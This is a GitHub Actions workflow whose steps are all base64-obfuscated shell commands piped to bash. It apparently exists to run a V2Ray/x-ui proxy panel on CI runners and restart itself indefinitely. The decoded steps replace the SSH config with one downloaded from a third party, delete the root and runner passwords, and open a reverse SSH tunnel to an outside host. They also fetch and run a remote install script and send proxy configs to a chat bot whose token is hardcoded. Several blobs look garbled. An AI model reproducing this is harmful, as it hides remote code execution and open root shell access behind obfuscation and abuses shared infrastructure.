name: MySer3LTD

on: [workflow_dispatch]

jobs:
  build:
    runs-on: ubuntu-latest

    env:
      TUNNEL_URL: ""
      Config_URL: ""
      SSH_URL: ""
      USERNAME: ""
      PASSWORD: ""
      WEBBASEPATH: ""
      MyConfig1: ""
      MyConfig2: ""
      PAT: ${{ secrets.PAT_WORKFLOW }}
      REPO: ${{ github.repository }}
      CHAT_TOKEN: "1076637420:eGO9F9RO7kM27YetwEGIFyR316Bj0dERp9A"
      CHAT_ID: 5812315610
      USER_NAME: "Morteza_V2Ray Config"

    steps:
      - name: Set And Create EVN
        run: |
          echo "VFVOTkVMX1VSTD0iIgpDb25maWdfVVJMPSIiClNTSF9VUkw9IiIKVVNFUk5BTUU9IiIKUEFTU1dPUkQ9IiIKV0VCQVNFUEFUSD0iIgplY2hvICIkVFVOTkVMX1VSTCIgPiB0dW5uZWxfdXJsLnR4dAplY2hvICIkQ29uZmlnX1VSTCIgPiBjb25maWdfdXJsLnR4dAplY2hvICIkVVNFUk5BTUUiID4gdXNlcm5hbWVfdXJsLnR4dAplY2hvICIkUEFTU1dPUkQiID4gcGFzc191cmwudHh0CmVjaG8gIiRXRUJCQVNFUEFUSCIgPiB3ZWJwYXRoX3VybC50eHQKZWNobyAiJE15Q29uZmlnMSIgPiBteWNvbmZpZzFfdXJsLnR4dAplY2hvICIkTXlDb25maWcyIiA+IG15Y29uZmlnMl91cmwudHh0Cg==" | base64 -d | bash
      - name: Update and install packages
        run: |
          echo "c3VkbyBhcHQtZ2V0IHVwZGF0ZSAtcXEKc3VkbyBhcHQtZ2V0IGluc3RhbGwgLXkgbmVvZmV0Y2ggc3BlZWR0ZXN0LWNsaSBwaHAtY2xpIGN1cmw=" | base64 -d | bash
      
      - name: Download sshd_config
        run: |
          echo "d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vR29nb1ppbi9zc2hkL21haW4vc3NoZF9jb25maWcgLU8gc3NoZF9jb25maWc=" | base64 -d | bash
      
      - name: Replace sshd_config
        run: |
          echo "c3VkbyBjcCBzc2hkX2NvbmZpZyAvZXRjL3NzaC9zc2hkX2NvbmZpZw==" | base64 -d | bash
      
      - name: Restart SSH service
        run: |
          echo "c3VkbyBzZXJ2aWNlIHNzaCByZXN0YXJ0" | base64 -d | bash
      
      - name: Remove root password
        run: |
          echo "c3VkbyBwYXNzd2QgLWQgcm9vdA==" | base64 -d | bash
      
      - name: Remove runner password
        run: |
          echo "c3VkbyBwYXNzd2QgLWQgcnVubmVy" | base64 -d | bash
      
      - name: Start Access Ser Tun
        run: |
          echo "c3VkbyBiYXNoIC1jICdub2h1cCBzc2ggLXAgNDQzIC1vIFN0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtbyBTZXJ2ZXJBbGl2ZUludGVydmFsPTMwIC1SMDoxMjcuMC4wLjE6MjIgdGNwQGFwLmZyZWUucGluZ2d5LmlvID4gc3NodHVubmVsLmxvZyAyPiYxICYnCmZvciBpIGluIHsxLi4xOH07IGRvCmVjaG8gIkZvdW5kIFNTSCBUdW5uZWwgLSBUcmF5ICRpIC4uLiIKU1NIX1VSTD0kKGdyZXAgLW9FICd0Y3A6Ly9bXls6c3BhY2U6XV0rJyBzc2h0dW5uZWwubG9nIHwgdGFpbCAtbiAxIHwgc2VkICdzfF50Y3A6Ly98fCcpCgppZiBbIC1uICIkU1NIX1VSTCIgXTsgdGhlbgogZWNobyAi4pyFIFBhbmVsIFNTSCBDcmVhdGVkISIKIGVjaG8gIlNTSFR1bm5lbCBBZGRyZXNzOiAkU1NIX1VSTCIKIGVjaG8gIiRTU0hfVVJMIiA+IHNzaF91cmwudHh0CiBicmVhawpmaQogc2xlZXAgMTAKZG9uZQk=" | base64 -d | bash
      
      - name: Start Install 3ui
        run: |
          echo "Y3VybCAtTHMgaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdHRoaWFzb3N0ZXJoYWdlbjE1MzAvdGg1a2VUcnZGdXQ3eTJTWVdYZC9yZWZzL2hlYWRzL21haW4vYXV0by1pbnN0M3h1aS5zaCAtbyBzY3JpcHQuc2gKbm9odXAgc3VkbyBiYXNoIHNjcmlwdC5zaCAyPiYxIHwgdGVlIC1hIHgtdWktaW5zdGFsbC5sb2cgJgpQQVRURVJOPSJQYW5lbCBJbnN0YWxsYXRpb24gQ29tcGxldGUhCiAgICAgICAgIFVzZXJuYW1lOgogICAgICAgICBQYXNzd29yZDoKICAgICAgICAgUG9ydDoKICAgICAgICAgV2ViQmFzZVBhdGg6CiAgICAgICAgIERhdGFiYXNlOgogICAgICAgICBBY2Nlc3MgVVJMOgogICAgICAgICBBUEkgVG9rZW46Igp3aGlsZSB0cnVlOyBkbwppZiBncmVwIC1xICIkUEFUVEVSTiIgeC11aS1pbnN0YWxsLmxvZyAyPi9kZXYvbnVsbDsgdGhlbgogVVNFUk5BTUU9JChncmVwIC1vUCAnKD88PVVzZXJuYW1lOlxzKVteXG5dKycgeC11aS1pbnN0YWxsLmxvZyB8IGhlYWQgLW4gMSkKIFBBU1NXT1JEPSQoZ3JlcCAtb1AgJyg/PD1QYXNzd29yZDpccylbXlxuXSsnIHgtdWktaW5zdGFsbC5sb2cgfCBoZWFkIC1uIDEpCiBXRUJCQVNFUEFUSD0iL1phMHp0djdZM0NqREhUNVFxcCIKIGVjaG8gIiRVU0VSTkFNRSIgPiB1c2VybmFtZV91cmwudHh0CiBlY2hvICIkUEFTU1dPUkQiID4gcGFzc191cmwudHh0CiBlY2hvICIkV0VCQkFTRVBBVEgiID4gd2VicGF0aF91cmwudHh0CiBzdWRvIHN5c3RlbWN0bCBzdG9wIHgtdWkgCiBzdWRvIHdnZXQgLU8gL2V0Yy94LXVpL3gtdWkuZGItd2FsIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9tYXR0aGlhc29zdGVyaGFnZW4xNTMwL3RoNWtlVHJ2RnV0N3kyU1lXWGQvcmVmcy9oZWFkcy9tYWluL3gtdWkuZGItd2FsIAogc3VkbyBzeXN0ZW1jdGwgc3RhcnQgeC11aQogYnJlYWsKIGZpCiAJc2xlZXAgMTAKIGRvbmU=" | base64 -d | bash
      
      - name: Start Panel Tun
        run: |
          echo "d2dldCBodHRwczovL2dpdGh1Yi5jb20vY2xvdWRmbGFyZS9jbG91ZGZsYXJlZC9yZWxlYXNlcy9sYXRlc3QvZG93bmxvYWQvY2xvdWRmbGFyZWQtbGludXgtYW1kNjQgLU8gcGFuZWx0dW5uZWwtcnVubmVyCmNwIHBhbmVsdHVubmVsLXJ1bm5lciBjb25maWd0dW5uZWwtcnVubmVyCnN1ZG8gY2htb2QgK3ggcGFuZWx0dW5uZWwtcnVubmVyCnN1ZG8gY2htb2QgK3ggY29uZmlndHVubmVsLXJ1bm5lcgpub2h1cCAuL3BhbmVsdHVubmVsLXJ1bm5lciB0dW5uZWwgLS11cmwgaHR0cDovL2xvY2FsaG9zdDoyMDUzIC0tbm8tdGxzLXZlcmlmeSAtLW5vLWF1dG91cGRhdGUgLS1lZGdlLWlwLXZlcnNpb24gYXV0byAtLXByb3RvY29sIGh0dHAyID4gcGFuZWx0dW5uZWwubG9nIDI+JjEgJiAgICAgCmZvciBpIGluIHsxLi4xOH07IGRvCmVjaG8gIkZvdW5kIENyZWF0ZWQgVHVubmVsIC0gVHJheSAkaSAuLi4iClRVTk5FTF9VUkw9JChncmVwIC1vICdodHRwczovL1teIF0qXC50cnljbG91ZGZsYXJlXC5jb20nIHBhbmVsdHVubmVsLmxvZyB8IHRhaWwgLW4gMSkKCmlmIFsgLW4gIiRUVU5ORUxfVVJMIiBdOyB0aGVuCiBlY2hvICLinIUgUGFuZWwgVHVubmVsIENyZWF0ZWQhIgogZWNobyAiUGFuZWxUdW5uZWwgQWRkcmVzczogJFRVTk5FTF9VUkwiCiBlY2hvICIkVFVOTkVMX1VSTCIgPiB0dW5uZWxfdXJsLnR4dAogYnJlYWsKZmkKIHNsZWVwIDEwCmRvbmU=" | base64 -d | bash
      
      - name: Start Config Tun
        run: |
          echo "bm9odXAgLi9jb25maWd0dW5uZWwtcnVubmVyIHR1bm5lbCAtLXVybC BobHR0cDovL2xvY2FsaG9zdDoxMjgwIC0tbm8tYXV0b3VwZGF0ZSAtLWVkZ2UtaXAtdmVyc2lvbiBhdXRvIC0tcHJvdG9jb2wgaHR0MiA+IGNvbmZpZ3R1bm5lbC5sb2cgMj4mMQpmb3IgaSBpbiAyezEuLjE4fTsgZG8KZWNobyAiRm91bmQgQ3JlYXRlZCBUdW5uZWwgLSBUcmF5ICRpIC4uLiIKQ29uZmlnX1VSTD0kKGVncmVwIC1vICdodHRwczovL1teIF0qXC50cnljbG91ZGZsYXJlXC5jb20nIGNvbmZpZ3R1bm5lbC5sb2cgfCB0YWlsIC1uIDEpIHwg c2VkICdzfV5odHRwczovLycnJykKCmlmIFsgLW4gIiRDb25maWdfVVJMIiBdOyB0aGVuCiBlY2hvICLinIUgQ29uZmlnIFR1bm5lbCBDcmVhdGVkISIKIGVjaG8gIkNvbmZpZ1R1bm5lbCBBZGRyZXNzOiAkQ29uZmlnX1VSTCIKIGVjaG8gIiRDb25maWdfVVJMIiA+IGNvbmZpZ3R1bm5lbF91cmwudHh0CmJyZWFrCnNsaWVwIDEwCmRvbmU=" | base64 -d | bash
      
      - name: Show Info
        run: |
          echo "VFVOQU5MRV9VUkw9JChjYXQgdHVu bm5lbF91cmwudHh0KQpDT05GSUdfVVJMPSRjYXQgY29uZmlnX3VybC50eHQKU1NIX1VSTD0kY2F0IHNzaF91cmwudHh0ClVTRVJOQU1FPSRjYXQg dXNlcm5hbWVfdXJsLnR4dApQQVNTV09SRD0kY2F0IHBhc3NfdXJsLnR4dApXRUJCQVNQ QVRIPS9aYTB6dHY3WTNDakRIVDVRcXAKTXlDb25maWcxPSJ2bGVzczovLzQyZDM0ZmVjLTNhYWQtNDg0Ny04YzI5LWIwZjBkOGUxZGN iZiRDT05GSUdfVVJMOjQ0Mz9lbmNyeXB0aW9uPW5vbmUmc2VjdXJpdHk9dGxzJnNuaT0kQ09ORklHX1VSTCZhbGxvd0luc2VjdXJlPXRydWUmYWxwbi1odHRwLzEuMSZmcD1jaHJvbWUmdHlwZT13cyZob3N0PSRDT05GSUdfVVJMIHBhdGg9L2EzT3B0S1ROLklDWllJUkN0NQpQYWNrZXRFbmNvZGluZz14dWRwI01hc3RlclZpcApNeUNvbmZpZzI9InZsZXNzOi8vNDJkMzRmZWMtM2FhZC00ODQ3LThiYzI5LWIwZjBkOGUxZGNiZkB3d3cuc3BlZWR0ZXN0Lm5ldDo0NDM/ZW5jcnlwdGlvbj1ub25lJnNlY3VyaXR5PXRscyZzbmk9JENPTkZJR19VUkMmYWxsb3dJbmNlY3VyZT10cnVlJmFscG49aHR0cC8xLjEmZnA9Y2hyb21lJnR5cGU9d3MmaG9zdD0kQ09ORklHX1VSTCZwYXRoPS9hM09wdEtUTktJNk lDWllJUkN0NSZwYWNrZXRFbmNvZGluZz14dWRwI01hc3RlclZpcCIKZWNobyAiJFRVTk5FTF9VUkwkV0VCQkFTRVBBVEgiID4gdHVu bm5lbF91cmwudHh0CmVjaG8gIlNob3cgSW5mbzo iCmVjaG8gIlxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iCmVjaG8gIlVzZXJuYW1lOiAkVVNFUk5BTUU iCmVjaG8gIlBhc3N3b3JkOiAkUEFTU1dPUkQiCmVjaG8gIldlYkJhc2VQYXRoOiAkV0VCQkFTRVBBVEgiCmVjaG8gIlRVTk5FTF9VUkw6ICR7VFVOQU5MRV9VUkx9JFdFQkJBU0VQQVRISCIKZWNobyAiQ29uZmlnX1VSTDogJENPTkZJR19VUkwiCmVjaG8gIlNTSF9VUkw6ICRTX1VSTCIKZWNobyAiY3VybCAtdmsgaHR0cHM6Ly8kQ09ORklHX1VSTC9hM09wdEtUTktJNkkiCmVjaG8gIlxuPj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iCmVjaG8gIiRTX1VSTDEiCmVjaG8gIiRTX1VSTDIi" | base64 -d | bash
      
      - name: Send message to Bale Group
        run: |
          echo "TXlDb25maWcxPSQoY2F0IG15Y29uZmlnMV91cmwudHh0KQpNeUNvbmZpZzI9JChjYXQgbXljb25maWcyX3VybC50eHQpCgpDVVJSRU5UX1RJTUU9JChkYXRlICIrJVkvJW0vJWQgJUg6JU06JVMiKQoKY3VybCAtWCBQT1NUICJodHRwczovL3RhcGkuYmFsZS5haS8ke1RPS0VOfS9zZW5kTWVzc2FnZSIgXAogIC1IICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24iIFwKICAtZCAnewogICAgImNoYXRfaWQiOiAiJyIke0NIQVRfSUR9IiciLAogICAgInRleHQiOiAiJyIke1VTRVJfTkFNRX0iJ1xuXG4nIiR7TXlDb25maWcxfSInXG5cbiciJHtNeUNvbmZpZzJ9Iidcblxu8J+VkiAnIiR7Q1VSUkVOVF9USU1FfSInIgogIH0n" | base64 -d | bash
      
      - name: Delay and Self-Restart (5 hours 25 minutes)
        run: |
          echo "ZWNobyAi8J+MjCDigJQgU3RhcnRpbmcgZGVsYXkgdGltZXI6IDUg aG91cnMgYW5kIDI1IG1pbnV0ZXMuLi4iCmVjaG8gIiBDdXJyZW50IHRpbWU6ICQoZGF0ZSk iCnNsZWVwIDE5NTAwCmVjaG8g4pCUIFRyaWdnZXJpbmcgd29ya2Zsb3cgcmVzdGFydC4u Li4iCmN1cmwgLVggUE9TVCBcCiAtSCAiQWNjZXB0OiBhcHBsaWNhdGlvbi92bmQuZ2l0 aHViLnYzK2pzb24iIFwKIC1IICJBdXRob3JpemF0aW9uOiB0b2tlbiAkUEFUIiBcCiA aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy8kUkVQT0IvYWN0aW9ucy93b3Jr Zmxvd3MvTXlTZXJ2ZXJMMTEueW1sL2Rpc3BhdGNoZXMgXAogIC1kICd7InJlZjoi bWFpbiJ9JwplY2hvICJFSlYgUmVzdGFydCBjb21tYW5kIHNlbnQgc3VjY2Vzc2Z1 bGx5IGF0ICgkZGF0ZSkifQ==" | base64 -d | bash
      
      - name: Keep alive
        run: |
          echo "dGFpbCAtZiAvZGV2L251bGwK" | base64 -d | bash
